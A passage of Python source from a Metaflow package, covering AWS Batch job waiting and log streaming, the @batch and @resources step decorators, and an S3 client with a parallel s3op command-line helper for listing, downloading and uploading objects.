'matcher': 'pathAll',
'state': 'success',
},
{
'argument': 'jobs[].status',
'expected': 'FAILED',
'matcher': 'pathAny',
'state': 'success',
},
{
'argument': 'jobs[].status',
'expected': 'RUNNING',
'matcher': 'pathAny',
'state': 'success',
},
],
}
},
}
)
self._waiter.create_waiter_with_client('JobRunning', model, self._client).wait(
jobs=[job_id]
)
class BatchLogs(object):
def __init__(self, group, stream, pos=0, sleep_on_no_data=0):
self._client = get_authenticated_boto3_client('logs')
self._group = group
self._stream = stream
self._pos = pos
self._sleep_on_no_data = sleep_on_no_data
self._buf = deque()
self._token = None
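# Fetch the next batch of CloudWatch log events, tracking the forward token so
# subsequent calls only return new events.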
def _get_events(self):
if self._token:
response = self._client.get_log_events(
logGroupName=self._group,
logStreamName=self._stream,
startTime=self._pos,
nextToken=self._token,
startFromHead=True,
)
else:
response = self._client.get_log_events(
logGroupName=self._group,
logStreamName=self._stream,
startTime=self._pos,
startFromHead=True,
)
self._token = response['nextForwardToken']
return response['events']
def __iter__(self):
while True:
self._fill_buf()
if len(self._buf) == 0:
yield ''
if self._sleep_on_no_data > 0:
select.poll().poll(self._sleep_on_no_data * 1000)
else:
while self._buf:
yield self._buf.popleft()
def _fill_buf(self):
events = self._get_events()
for event in events:
self._buf.append(event['message'])
self._pos = event['timestamp'] | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/plugins/aws/batch/batch_client.py | batch_client.py |
import os
import sys
import platform
import re
import tarfile
from metaflow.datastore import MetaflowDataStore
from metaflow.datastore.datastore import TransformableObject
from metaflow.datastore.util.s3util import get_s3_client
from metaflow.decorators import StepDecorator
from metaflow.metaflow_config import DATASTORE_LOCAL_DIR
from metaflow.plugins.timeout_decorator import get_run_time_limit_for_task
from metaflow import util
from .batch import Batch, BatchException
from metaflow.metaflow_config import ECS_S3_ACCESS_IAM_ROLE, BATCH_JOB_QUEUE, \
BATCH_CONTAINER_IMAGE, BATCH_CONTAINER_REGISTRY
try:
# python2
from urlparse import urlparse
except: # noqa E722
# python3
from urllib.parse import urlparse
class ResourcesDecorator(StepDecorator):
"""
Step decorator to specify the resources needed when executing this step.
This decorator passes this information along to Batch when requesting resources
to execute this step.
This decorator is ignored if the execution of the step does not happen on Batch.
To use, annotate your step as follows:
```
@resources(cpu=32)
@step
def myStep(self):
...
```
Parameters
----------
cpu : int
Number of CPUs required for this step. Defaults to 1
gpu : int
Number of GPUs required for this step. Defaults to 0
memory : int
Memory size (in MB) required for this step. Defaults to 4000
"""
name = 'resources'
defaults = {
'cpu': '1',
'gpu': '0',
'memory': '4000',
}
class BatchDecorator(StepDecorator):
"""
Step decorator to specify that this step should execute on Batch.
This decorator indicates that your step should execute on Batch. Note that you can
apply this decorator automatically to all steps using the ```--with batch``` argument
when calling run. Step level decorators are overrides and will force a step to execute
on Batch regardless of the ```--with``` specification.
To use, annotate your step as follows:
```
@batch
@step
def myStep(self):
...
```
Parameters
----------
cpu : int
Number of CPUs required for this step. Defaults to 1. If @resources is also
present, the maximum value from all decorators is used
gpu : int
Number of GPUs required for this step. Defaults to 0. If @resources is also
present, the maximum value from all decorators is used
memory : int
Memory size (in MB) required for this step. Defaults to 4000. If @resources is
also present, the maximum value from all decorators is used
image : string
Image to use when launching on Batch. If not specified, a default image mapping to
the current version of Python is used
queue : string
Queue to submit the job to. Defaults to the one determined by the environment variable
METAFLOW_BATCH_JOB_QUEUE
iam_role : string
IAM role that Batch can use to access S3. Defaults to the one determined by the environment
variable METAFLOW_ECS_S3_ACCESS_IAM_ROLE
"""
name = 'batch'
defaults = {
'cpu': '1',
'gpu': '0',
'memory': '4000',
'image': None,
'queue': BATCH_JOB_QUEUE,
'iam_role': ECS_S3_ACCESS_IAM_ROLE
}
package_url = None
package_sha = None
run_time_limit = None
def __init__(self, attributes=None, statically_defined=False):
super(BatchDecorator, self).__init__(attributes, statically_defined)
if not self.attributes['image']:
if BATCH_CONTAINER_IMAGE:
self.attributes['image'] = BATCH_CONTAINER_IMAGE
else:
self.attributes['image'] = 'python:%s.%s' % (platform.python_version_tuple()[0],
platform.python_version_tuple()[1])
if not BatchDecorator._get_registry(self.attributes['image']):
if BATCH_CONTAINER_REGISTRY:
self.attributes['image'] = '%s/%s' % (BATCH_CONTAINER_REGISTRY.rstrip('/'),
self.attributes['image'])
def step_init(self, flow, graph, step, decos, environment, datastore, logger):
if datastore.TYPE != 's3':
raise BatchException('The *@batch* decorator requires --datastore=s3.')
self.logger = logger
self.environment = environment
self.step = step
for deco in decos:
if isinstance(deco, ResourcesDecorator):
for k, v in deco.attributes.items():
# we use the larger of @resources and @batch attributes
my_val = self.attributes.get(k)
if not (my_val is None and v is None):
self.attributes[k] = str(max(int(my_val or 0), int(v or 0)))
self.run_time_limit = get_run_time_limit_for_task(decos)
def runtime_init(self, flow, graph, package, run_id):
self.flow = flow
self.graph = graph
self.package = package
self.run_id = run_id
def runtime_task_created(
self, datastore, task_id, split_index, input_paths, is_cloned):
if not is_cloned:
self._save_package_once(datastore, self.package)
def runtime_step_cli(self, cli_args, retry_count, max_user_code_retries):
if retry_count <= max_user_code_retries:
# after all attempts to run the user code have failed, we don't need
# Batch anymore. We can execute possible fallback code locally.
cli_args.commands = ['batch', 'step']
cli_args.command_args.append(self.package_sha)
cli_args.command_args.append(self.package_url)
cli_args.command_options.update(self.attributes)
cli_args.command_options['run-time-limit'] = self.run_time_limit
cli_args.entrypoint[0] = sys.executable
def task_pre_step(
self, step_name, ds, meta, run_id, task_id, flow, graph, retry_count, max_retries):
if meta.TYPE == 'local':
self.ds_root = ds.root
else:
self.ds_root = None
def task_finished(self, step_name, flow, graph, is_task_ok, retry_count, max_retries):
if self.ds_root:
# We have a local metadata service so we need to persist it to the datastore.
# Note that the datastore is *always* s3 (see runtime_task_created function)
with util.TempDir() as td:
tar_file_path = os.path.join(td, 'metadata.tgz')
with tarfile.open(tar_file_path, 'w:gz') as tar:
# The local metadata is stored in the local datastore
# which, for batch jobs, is always the DATASTORE_LOCAL_DIR
tar.add(DATASTORE_LOCAL_DIR)
# At this point we upload what need to s3
s3, _ = get_s3_client()
with open(tar_file_path, 'rb') as f:
path = os.path.join(
self.ds_root,
MetaflowDataStore.filename_with_attempt_prefix(
'metadata.tgz', retry_count))
url = urlparse(path)
s3.upload_fileobj(f, url.netloc, url.path.lstrip('/'))
@classmethod
def _save_package_once(cls, datastore, package):
if cls.package_url is None:
cls.package_url = datastore.save_data(package.sha, TransformableObject(package.blob))
cls.package_sha = package.sha
@classmethod
def _get_registry(cls, image):
pattern = re.compile(r'^(?:([^\/]+)\/)?(?:([^\/]+)\/)?([^@:\/]+)(?:[@:](.+))?$')
groups = pattern.match(image).groups()
registry = groups[0]
namespace = groups[1]
# The leading component is a registry only if it looks like a host
# (contains '.' or ':'); otherwise it is just a namespace.
if not namespace and registry and not re.search(r'[:.]', registry):
return None
return registry | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/plugins/aws/batch/batch_decorator.py | batch_decorator.py |
import os
import sys
import time
import shutil
import random
import subprocess
from itertools import starmap
from tempfile import mkdtemp, NamedTemporaryFile
from .. import current, FlowSpec
from ..metaflow_config import DATATOOLS_S3ROOT
from ..util import is_stringish,\
to_bytes,\
to_unicode,\
to_fileobj,\
url_quote,\
url_unquote
from ..exception import MetaflowException
from ..debug import debug
from . import s3op
try:
# python2
from urlparse import urlparse
except:
# python3
from urllib.parse import urlparse
from ..metaflow_config import get_authenticated_boto3_client
from botocore.exceptions import ClientError
NUM_S3OP_RETRIES = 8
class MetaflowS3InvalidObject(MetaflowException):
headline = 'Not a string-like object'
class MetaflowS3URLException(MetaflowException):
headline = 'Invalid address'
class MetaflowS3Exception(MetaflowException):
headline = 'S3 access failed'
class MetaflowS3NotFound(MetaflowException):
headline = 'S3 object not found'
class MetaflowS3AccessDenied(MetaflowException):
headline = 'S3 access denied'
class S3Object(object):
"""
This object represents a path or an object in S3,
with an optional local copy.
Get or list calls return one or more of S3Objects.
"""
def __init__(self, prefix, url, path, size=None):
# all fields of S3Object should return a unicode object
def ensure_unicode(x):
return None if x is None else to_unicode(x)
prefix, url, path = map(ensure_unicode, (prefix, url, path))
self._size = size
self._url = url
self._path = path
self._key = None
if path:
self._size = os.stat(self._path).st_size
if prefix is None or prefix == url:
self._key = url
self._prefix = None
else:
self._key = url[len(prefix.rstrip('/')) + 1:].rstrip('/')
self._prefix = prefix
@property
def exists(self):
"""
Does this key correspond to an object in S3?
"""
return self._size is not None
@property
def downloaded(self):
"""
Has this object been downloaded?
"""
return bool(self._path)
@property
def url(self):
"""
S3 location of the object
"""
return self._url
@property
def prefix(self):
"""
Prefix requested that matches the object.
"""
return self._prefix
@property
def key(self):
"""
Key corresponds to the key given to the get call that produced
this object. This may be a full S3 URL or a suffix based on what
was requested.
"""
return self._key
@property
def path(self):
"""
Path to the local file corresponding to the object downloaded.
This file gets deleted automatically when an S3 scope exits.
Returns None if this S3Object has not been downloaded.
"""
return self._path
@property
def blob(self):
"""
Contents of the object as a byte string.
Returns None if this S3Object has not been downloaded.
"""
if self._path:
with open(self._path, 'rb') as f:
return f.read()
@property
def text(self):
"""
Contents of the object as a Unicode string.
Returns None if this S3Object has not been downloaded.
"""
if self._path:
return self.blob.decode('utf-8', errors='replace')
@property
def size(self):
"""
Size of the object in bytes.
Returns None if the key does not correspond to an object in S3.
"""
return self._size
def __str__(self):
if self._path:
return '<S3Object %s (%d bytes, local)>' % (self._url, self._size)
elif self._size:
return '<S3Object %s (%d bytes, in S3)>' % (self._url, self._size)
else:
return '<S3Object %s (object does not exist)>' % self._url
def __repr__(self):
return str(self)
class S3(object):
def __init__(self,
tmproot='.',
bucket=None,
prefix=None,
run=None,
s3root=None):
"""
Initialize a new context for S3 operations. This object is typically used
as a context manager in a with statement.
There are two ways to initialize this object, depending on whether you want
to bind paths to a Metaflow run or not.
1. With a run object:
run: (required) Either a FlowSpec object (typically 'self') or a
Run object corresponding to an existing Metaflow run. These
are used to add a version suffix in the S3 path.
bucket: (optional) S3 bucket.
prefix: (optional) S3 prefix.
2. Without a run object:
s3root: (optional) An S3 root URL for all operations. If this is
not specified, all operations require a full S3 URL.
These options are supported in both the modes:
tmproot: (optional) Root path for temporary files (default: '.')
"""
if run:
# 1. use a (current) run ID with optional customizations
parsed = urlparse(DATATOOLS_S3ROOT)
if not bucket:
bucket = parsed.netloc
if not prefix:
prefix = parsed.path
if isinstance(run, FlowSpec):
if current.is_running_flow:
prefix = os.path.join(prefix,
current.flow_name,
current.run_id)
else:
raise MetaflowS3URLException(\
"Initializing S3 with a FlowSpec outside of a running "
"flow is not supported.")
else:
prefix = os.path.join(prefix, run.parent.id, run.id)
self._s3root = u's3://%s' % os.path.join(bucket, prefix.strip('/'))
elif s3root:
# 2. use an explicit S3 prefix
parsed = urlparse(to_unicode(s3root))
if parsed.scheme != 's3':
raise MetaflowS3URLException(\
"s3root needs to be an S3 URL prefxied with s3://.")
self._s3root = s3root.rstrip('/')
else:
# 3. use the client only with full URLs
self._s3root = None
self._tmpdir = mkdtemp(dir=tmproot, prefix='metaflow.s3.')
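# Minimal usage sketch (hypothetical bucket and keys):
#
#   with S3(s3root='s3://my-bucket/some/prefix') as s3:
#       url = s3.put('config.json', '{"x": 1}')
#       obj = s3.get('config.json')
#       print(obj.url, obj.size, obj.text)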
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def close(self):
"""
Delete all temporary files downloaded in this context.
"""
try:
if not debug.s3client:
shutil.rmtree(self._tmpdir)
except:
pass
def _url(self, key):
# NOTE: All URLs are handled as Unicode objects (unicode in py2,
# str in py3) internally. We expect all URLs passed to this
# class to be either Unicode or UTF-8 encoded byte strings. All URLs
# returned are Unicode.
if self._s3root is None:
parsed = urlparse(to_unicode(key))
if parsed.scheme == 's3' and parsed.path:
return key
else:
if current.is_running_flow:
raise MetaflowS3URLException(\
"Specify S3(run=self) when you use S3 inside a running "
"flow. Otherwise you have to use S3 with full "
"s3:// urls.")
else:
raise MetaflowS3URLException(\
"Initialize S3 with an 's3root' or 'run' if you don't "
"want to specify full s3:// urls.")
elif key:
if key.startswith('s3://'):
raise MetaflowS3URLException(\
"Don't use absolute S3 URLs when the S3 client is "
"initialized with a prefix. URL: %s" % key)
return os.path.join(self._s3root, key)
else:
return self._s3root
def list_paths(self, keys=None):
"""
List the next level of paths in S3. If multiple keys are
specified, listings are done in parallel. The returned
S3Objects have .exists == False if the url refers to a
prefix, not an existing S3 object.
Args:
keys: (required) a list of suffixes for paths to list.
Returns:
a list of S3Objects (not downloaded)
Example:
Consider the following paths in S3:
A/B/C
D/E
In this case, list_paths(['A', 'D']) returns ['A/B', 'D/E']. The
first S3Object has .exists == False, since it does not refer to an
object in S3. It is just a prefix.
"""
def _list(keys):
if keys is None:
keys = [None]
urls = (self._url(key).rstrip('/') + '/' for key in keys)
res = self._read_many_files('list', urls)
for s3prefix, s3url, size in res:
if size:
yield s3prefix, s3url, None, int(size)
else:
yield s3prefix, s3url, None, None
return list(starmap(S3Object, _list(keys)))
def list_recursive(self, keys=None):
"""
List objects in S3 recursively. If multiple keys are
specified, listings are done in parallel. The returned
S3Objects have always .exists == True, since they refer
to existing objects in S3.
Args:
keys: (required) a list of suffixes for paths to list.
Returns:
a list of S3Objects (not downloaded)
Example:
Consider the following paths in S3:
A/B/C
D/E
In this case, list_recursive(['A', 'D']) returns ['A/B/C', 'D/E'].
"""
def _list(keys):
if keys is None:
keys = [None]
res = self._read_many_files('list',
map(self._url, keys),
recursive=True)
for s3prefix, s3url, size in res:
yield s3prefix, s3url, None, int(size)
return list(starmap(S3Object, _list(keys)))
def get(self, key=None, return_missing=False):
"""
Get a single object from S3.
Args:
key: (optional) a suffix identifying the object.
return_missing: (optional, default False) if set to True, do
not raise an exception for a missing key but
return it as an S3Object with .exists == False.
Returns:
an S3Object corresponding to the object requested.
"""
url = self._url(key)
src = urlparse(url)
def _download(s3, tmp):
s3.download_file(src.netloc, src.path.lstrip('/'), tmp)
return url
try:
path = self._one_boto_op(_download, url)
except MetaflowS3NotFound:
if return_missing:
path = None
else:
raise
return S3Object(self._s3root, url, path)
def get_many(self, keys, return_missing=False):
"""
Get many objects from S3 in parallel.
Args:
keys: (required) a list of suffixes identifying the objects.
return_missing: (optional, default False) if set to True, do
not raise an exception for a missing key but
return it as an S3Object with .exists == False.
Returns:
a list of S3Objects corresponding to the objects requested.
"""
def _get():
res = self._read_many_files('get',
map(self._url, keys),
allow_missing=return_missing,
verify=True,
verbose=False,
listing=True)
for s3prefix, s3url, fname in res:
if fname:
yield self._s3root, s3url, os.path.join(self._tmpdir, fname)
else:
# missing entries per return_missing=True
yield self._s3root, s3prefix, None, None
return list(starmap(S3Object, _get()))
def get_recursive(self, keys):
"""
Get many objects from S3 recursively in parallel.
Args:
keys: (required) a list of suffixes for paths to download
recursively.
Returns:
a list of S3Objects corresponding to the objects requested.
"""
def _get():
res = self._read_many_files('get',
map(self._url, keys),
recursive=True,
verify=True,
verbose=False,
listing=True)
for s3prefix, s3url, fname in res:
yield s3prefix, s3url, os.path.join(self._tmpdir, fname)
return list(starmap(S3Object, _get()))
def get_all(self):
"""
Get all objects from S3 recursively (in parallel). This request
only works if S3 is initialized with a run or a s3root prefix.
Returns:
a list of S3Objects corresponding to the objects requested.
"""
if self._s3root is None:
raise MetaflowS3URLException(\
"Can't get_all() when S3 is initialized without a prefix")
else:
return self.get_recursive([None])
def put(self, key, obj, overwrite=True):
"""
Put an object to S3.
Args:
key: (required) suffix for the object.
obj: (required) a bytes, string, or a unicode object to
be stored in S3.
overwrite: (optional) overwrites the key with obj, if it exists
Returns:
an S3 URL corresponding to the object stored.
"""
if not is_stringish(obj):
raise MetaflowS3InvalidObject(\
"Object corresponding to the key '%s' is not a string "
"or a bytes object." % key)
url = self._url(key)
src = urlparse(url)
def _upload(s3, tmp):
# we need to recreate the StringIO object for retries since
# apparently upload_fileobj will/may close() it
blob = to_fileobj(obj)
s3.upload_fileobj(blob, src.netloc, src.path.lstrip('/'))
if overwrite:
self._one_boto_op(_upload, url)
return url
else:
def _head(s3, tmp):
s3.head_object(Bucket=src.netloc, Key=src.path.lstrip('/'))
try:
self._one_boto_op(_head, url)
except MetaflowS3NotFound as err:
self._one_boto_op(_upload, url)
return url
def put_many(self, key_objs, overwrite=True):
"""
Put objects to S3 in parallel.
Args:
key_objs: (required) an iterator of (key, value) tuples. Value must
be a string, bytes, or a unicode object.
overwrite: (optional) overwrites the key with obj, if it exists
Returns:
a list of (key, S3 URL) tuples corresponding to the files sent.
"""
def _store():
for key, obj in key_objs:
if is_stringish(obj):
with NamedTemporaryFile(dir=self._tmpdir,
delete=False,
mode='wb',
prefix='metaflow.s3.put_many.') as tmp:
tmp.write(to_bytes(obj))
tmp.close()
yield tmp.name, self._url(key), key
else:
raise MetaflowS3InvalidObject(
"Object corresponding to the key '%s' is not a string "
"or a bytes object." % key)
return self._put_many_files(_store(), overwrite)
def put_files(self, key_paths, overwrite=True):
"""
Put files to S3 in parallel.
Args:
key_paths: (required) an iterator of (key, path) tuples.
overwrite: (optional) overwrites the key with obj, if it exists
Returns:
a list of (key, S3 URL) tuples corresponding to the files sent.
"""
def _check():
for key, path in key_paths:
if not os.path.exists(path):
raise MetaflowS3NotFound("Local file not found: %s" % path)
yield path, self._url(key), key
return self._put_many_files(_check(), overwrite)
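# Execute a single boto3 operation against a temporary local file, retrying
# with exponential backoff and jitter; 404 and 403 responses are surfaced
# immediately as typed exceptions.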
def _one_boto_op(self, op, url):
error = ''
for i in range(NUM_S3OP_RETRIES):
tmp = NamedTemporaryFile(dir=self._tmpdir,
prefix='metaflow.s3.one_file.',
delete=False)
try:
s3 = get_authenticated_boto3_client('s3')
op(s3, tmp.name)
return tmp.name
except ClientError as err:
error_code = s3op.normalize_client_error(err)
if error_code == 404:
raise MetaflowS3NotFound(url)
elif error_code == 403:
raise MetaflowS3AccessDenied(url)
error = str(err)
except Exception as ex:
# TODO specific error message for out of disk space
error = str(ex)
os.unlink(tmp.name)
# add some jitter to make sure retries are not synchronized
time.sleep(2**i + random.randint(0, 10))
raise MetaflowS3Exception("S3 operation failed.\n"\
"Key requested: %s\n"\
"Error: %s" % (url, error))
# NOTE: re: _read_many_files and _put_many_files
# All file IO is through binary files - we write bytes, we read
# bytes. All inputs and outputs from these functions are Unicode.
# Conversion between bytes and unicode is done through url_quote
# and url_unquote.
def _read_many_files(self, op, prefixes, **options):
with NamedTemporaryFile(dir=self._tmpdir,
mode='wb',
delete=not debug.s3client,
prefix='metaflow.s3.inputs.') as inputfile:
inputfile.write(b'\n'.join(map(url_quote, prefixes)))
inputfile.flush()
stdout, stderr = self._s3op_with_retries(op,
inputs=inputfile.name,
**options)
if stderr:
raise MetaflowS3Exception("Getting S3 files failed.\n"\
"First prefix requested: %s\n"\
"Error: %s" % (prefixes[0], stderr))
else:
for line in stdout.splitlines():
yield tuple(map(url_unquote, line.strip(b'\n').split(b' ')))
def _put_many_files(self, url_files, overwrite):
url_files = list(url_files)
with NamedTemporaryFile(dir=self._tmpdir,
mode='wb',
delete=not debug.s3client,
prefix='metaflow.s3.put_inputs.') as inputfile:
lines = (b' '.join(map(url_quote, (os.path.realpath(local), url)))
for local, url, _ in url_files)
inputfile.write(b'\n'.join(lines))
inputfile.flush()
stdout, stderr = self._s3op_with_retries('put',
filelist=inputfile.name,
verbose=False,
overwrite=overwrite,
listing=True)
if stderr:
raise MetaflowS3Exception("Uploading S3 files failed.\n"\
"First key: %s\n"\
"Error: %s" % (url_files[0][2],
stderr))
else:
urls = set()
for line in stdout.splitlines():
url, _, _ = map(url_unquote, line.strip(b'\n').split(b' '))
urls.add(url)
return [(key, url) for _, url, key in url_files if url in urls]
def _s3op_with_retries(self, mode, **options):
cmdline = [sys.executable, os.path.abspath(s3op.__file__), mode]
for key, value in options.items():
key = key.replace('_', '-')
if isinstance(value, bool):
if value:
cmdline.append('--%s' % key)
else:
cmdline.append('--no-%s' % key)
else:
cmdline.extend(('--%s' % key, value))
for i in range(NUM_S3OP_RETRIES):
with NamedTemporaryFile(dir=self._tmpdir,
mode='wb+',
delete=not debug.s3client,
prefix='metaflow.s3op.stderr') as stderr:
try:
debug.s3client_exec(cmdline)
stdout = subprocess.check_output(cmdline,
cwd=self._tmpdir,
stderr=stderr.file)
return stdout, None
except subprocess.CalledProcessError as ex:
stderr.seek(0)
err_out = stderr.read().decode('utf-8', errors='replace')
stderr.seek(0)
if ex.returncode == s3op.ERROR_URL_NOT_FOUND:
raise MetaflowS3NotFound(err_out)
elif ex.returncode == s3op.ERROR_URL_ACCESS_DENIED:
raise MetaflowS3AccessDenied(err_out)
time.sleep(2**i + random.randint(0, 10))
        return None, err_out
from __future__ import print_function
import time
import math
import string
import sys
import os
import traceback
from hashlib import sha1
from tempfile import NamedTemporaryFile
from multiprocessing import Process, Queue
from collections import namedtuple
from itertools import starmap, chain, islice
try:
# python2
from urlparse import urlparse
from Queue import Full as QueueFull
except:
# python3
from urllib.parse import urlparse
from queue import Full as QueueFull
import click
# s3op can be launched as a stand-alone script. We must set
# PYTHONPATH for the parent Metaflow explicitly.
sys.path.insert(0,\
os.path.abspath(os.path.join(os.path.dirname(__file__), '../../')))
# we use Metaflow's parallel_imap_unordered instead of
# multiprocessing.Pool because https://bugs.python.org/issue31886
from metaflow.util import url_quote, url_unquote
from metaflow.multicore_utils import parallel_map
from metaflow.datastore.util.s3util import aws_retry
NUM_WORKERS_DEFAULT = 64
S3Url = namedtuple('S3Url', ['bucket', 'path', 'url', 'local', 'prefix'])
# We use error codes instead of Exceptions, which are trickier to
# handle reliably in a multi-process world
ERROR_INVALID_URL = 4
ERROR_NOT_FULL_PATH = 5
ERROR_URL_NOT_FOUND = 6
ERROR_URL_ACCESS_DENIED = 7
ERROR_WORKER_EXCEPTION = 8
ERROR_VERIFY_FAILED = 9
ERROR_LOCAL_FILE_NOT_FOUND = 10
def format_triplet(prefix, url='', local=''):
return u' '.join(url_quote(x).decode('utf-8') for x in (prefix, url, local))
# I can't understand what's the right way to deal
# with boto errors. This function can be replaced
# with better error handling code.
def normalize_client_error(err):
error_code = err.response['Error']['Code']
try:
return int(error_code)
except ValueError:
if error_code == 'AccessDenied':
return 403
return error_code
# S3 worker pool
def worker(queue, mode):
try:
from metaflow.metaflow_config import get_authenticated_boto3_client
s3 = get_authenticated_boto3_client('s3')
while True:
url = queue.get()
if url is None:
break
if mode == 'download':
tmp = NamedTemporaryFile(dir='.', delete=False)
try:
s3.download_file(url.bucket, url.path, tmp.name)
os.rename(tmp.name, url.local)
except:
# TODO specific error message for out of disk space
os.unlink(tmp.name)
raise
else:
s3.upload_file(url.local, url.bucket, url.path)
except:
traceback.print_exc()
sys.exit(ERROR_WORKER_EXCEPTION)
def start_workers(mode, urls, num_workers):
queue = Queue(len(urls) + num_workers)
procs = {}
# 1. push sources and destinations to the queue
for url, _ in urls:
queue.put(url)
# 2. push end-of-queue markers
for i in range(num_workers):
queue.put(None)
# 3. start processes
for i in range(num_workers):
p = Process(target=worker, args=(queue, mode))
p.start()
procs[p] = True
# 4. wait for the processes to finish
while any(procs.values()):
for proc, is_alive in procs.items():
if is_alive:
proc.join(timeout=1)
if proc.exitcode is not None:
if proc.exitcode == 0:
procs[proc] = False
else:
msg = 'Worker process failed (exit code %d)'\
% proc.exitcode
exit(msg, proc.exitcode)
def process_urls(mode, urls, verbose, num_workers):
if verbose:
print('%sing %d files..' % (mode.capitalize(), len(urls)),
file=sys.stderr)
start = time.time()
start_workers(mode, urls, num_workers)
end = time.time()
if verbose:
total_size = sum(size for url, size in urls)
bw = total_size / (end - start)
print('%sed %d files, %s in total, in %d seconds (%s/s).'\
% (mode.capitalize(),
len(urls),
with_unit(total_size),
end - start,
with_unit(bw)),
file=sys.stderr)
# Utility functions
def with_unit(x):
if x > 1024**3:
return '%.1fGB' % (x / 1024.**3)
elif x > 1024**2:
return '%.1fMB' % (x / 1024.**2)
elif x > 1024:
return '%.1fKB' % (x / 1024.)
else:
return '%d bytes' % x
# S3Ops class is just a wrapper for get_size and list_prefix
# required by @aws_retry decorator, which needs the reset_client
# method. Otherwise they would be just stand-alone functions.
class S3Ops(object):
def __init__(self):
self.s3 = None
def reset_client(self, hard_reset=False):
from metaflow.metaflow_config import get_authenticated_boto3_client
if hard_reset or self.s3 is None:
self.s3 = get_authenticated_boto3_client('s3')
@aws_retry
def get_size(self, url):
self.reset_client()
try:
head = self.s3.head_object(Bucket=url.bucket, Key=url.path)
return True, url, [(url, head['ContentLength'])]
except ClientError as err:
error_code = normalize_client_error(err)
if error_code == 404:
return False, url, ERROR_URL_NOT_FOUND
elif error_code == 403:
return False, url, ERROR_URL_ACCESS_DENIED
else:
raise
@aws_retry
def list_prefix(self, prefix_url, delimiter=''):
self.reset_client()
url_base = 's3://%s/' % prefix_url.bucket
try:
paginator = self.s3.get_paginator('list_objects_v2')
urls = []
for page in paginator.paginate(Bucket=prefix_url.bucket,
Prefix=prefix_url.path,
Delimiter=delimiter):
# note that an url may be both a prefix and an object
# - the trailing slash is significant in S3
if 'Contents' in page:
for key in page.get('Contents', []):
url = url_base + key['Key']
urlobj = S3Url(url=url,
bucket=prefix_url.bucket,
path=key['Key'],
local=generate_local_path(url),
prefix=prefix_url.url)
urls.append((urlobj, key['Size']))
if 'CommonPrefixes' in page:
# we get CommonPrefixes if Delimiter is a non-empty string
for key in page.get('CommonPrefixes', []):
url = url_base + key['Prefix']
urlobj = S3Url(url=url,
bucket=prefix_url.bucket,
path=key['Prefix'],
local=None,
prefix=prefix_url.url)
urls.append((urlobj, None))
return True, prefix_url, urls
except self.s3.exceptions.NoSuchBucket:
return False, prefix_url, ERROR_URL_NOT_FOUND
except ClientError as err:
if err.response['Error']['Code'] == 'AccessDenied':
return False, prefix_url, ERROR_URL_ACCESS_DENIED
else:
raise
# We want to reuse an s3 client instance over multiple operations.
# This is accomplished by op_ functions below.
def op_get_size(urls):
s3 = S3Ops()
return [s3.get_size(url) for url in urls]
def op_list_prefix(prefix_urls):
s3 = S3Ops()
return [s3.list_prefix(prefix) for prefix in prefix_urls]
def op_list_prefix_nonrecursive(prefix_urls):
s3 = S3Ops()
return [s3.list_prefix(prefix, delimiter='/') for prefix in prefix_urls]
def exit(exit_code, url):
if exit_code == ERROR_INVALID_URL:
msg = 'Invalid url: %s' % url.url
elif exit_code == ERROR_NOT_FULL_PATH:
msg = 'URL not a full path: %s' % url.url
elif exit_code == ERROR_URL_NOT_FOUND:
msg = 'URL not found: %s' % url.url
elif exit_code == ERROR_URL_ACCESS_DENIED:
msg = 'Access denied to URL: %s' % url.url
elif exit_code == ERROR_WORKER_EXCEPTION:
msg = 'Download failed'
elif exit_code == ERROR_VERIFY_FAILED:
msg = 'Verification failed for URL %s, local file %s'\
% (url.url, url.local)
elif exit_code == ERROR_LOCAL_FILE_NOT_FOUND:
msg = 'Local file not found: %s' % url
else:
msg = 'Unknown error'
print('s3op failed:\n%s' % msg, file=sys.stderr)
sys.exit(exit_code)
def verify_results(urls, verbose=False):
for url, expected in urls:
if verbose:
print('verifying %s, expected %s' % (url, expected),
file=sys.stderr)
try:
got = os.stat(url.local).st_size
except OSError:
            # the local file is missing; report it as a verification failure
            exit(ERROR_VERIFY_FAILED, url)
if expected != got:
exit(ERROR_VERIFY_FAILED, url)
def generate_local_path(url):
# this function generates a safe local file name corresponding to
    # an S3 URL. URLs may be longer than the maximum file name length on Linux,
# so we mostly hash the URL but retain the leaf part as a convenience
# feature to ease eyeballing
quoted = url_quote(url)
fname = quoted.split(b'/')[-1].replace(b'.', b'_').replace(b'-', b'_')
sha = sha1(quoted).hexdigest()
return u'-'.join((sha, fname.decode('utf-8')))
def parallel_op(op, lst, num_workers):
# parallel op divides work equally amongst num_workers
# processes. This is a good strategy if the cost is
# uniform over the units of work, e.g. op_get_size, which
# is a single HEAD request to S3.
#
# This approach is less optimal with op_list_prefix where
# the cost of S3 listing per prefix can vary drastically.
# We could optimize this case by using a worker model with
# a queue, like for downloads but the difference here is
# that we need to return a value, which would require a
# bit more work - something to consider if this turns out
# to be a bottleneck.
if lst:
num = min(len(lst), num_workers)
        batch_size = int(math.ceil(len(lst) / float(num)))
batches = []
it = iter(lst)
while True:
batch = list(islice(it, batch_size))
if batch:
batches.append(batch)
else:
break
it = parallel_map(op, batches, max_parallel=num)
for x in chain.from_iterable(it):
yield x
# CLI
@click.group()
def cli():
pass
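# Illustrative invocations of the commands below (bucket names and paths are
# placeholders; the flags map to the click options declared on each command):
#
#   python s3op.py list --recursive s3://my-bucket/some/prefix/
#   python s3op.py get --verify --listing s3://my-bucket/some/prefix/key
#   python s3op.py put --file local.dat s3://my-bucket/some/prefix/key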
@cli.command('list', help='List S3 objects')
@click.option('--inputs',
type=click.Path(exists=True),
help='Read input prefixes from the given file.')
@click.option('--num-workers',
default=NUM_WORKERS_DEFAULT,
show_default=True,
help='Number of concurrent connections.')
@click.option('--recursive/--no-recursive',
default=False,
show_default=True,
help='Download prefixes recursively.')
@click.argument('prefixes', nargs=-1)
def lst(prefixes,
inputs=None,
num_workers=None,
recursive=None):
urllist = []
for prefix in _populate_prefixes(prefixes, inputs):
src = urlparse(prefix)
url = S3Url(url=prefix,
bucket=src.netloc,
path=src.path.lstrip('/'),
local=None,
prefix=prefix)
if src.scheme != 's3':
exit(ERROR_INVALID_URL, url)
urllist.append(url)
op = op_list_prefix if recursive else op_list_prefix_nonrecursive
urls = []
for success, prefix_url, ret in parallel_op(op, urllist, num_workers):
if success:
urls.extend(ret)
else:
exit(ret, prefix_url)
for url, size in urls:
if size is None:
print(format_triplet(url.prefix, url.url))
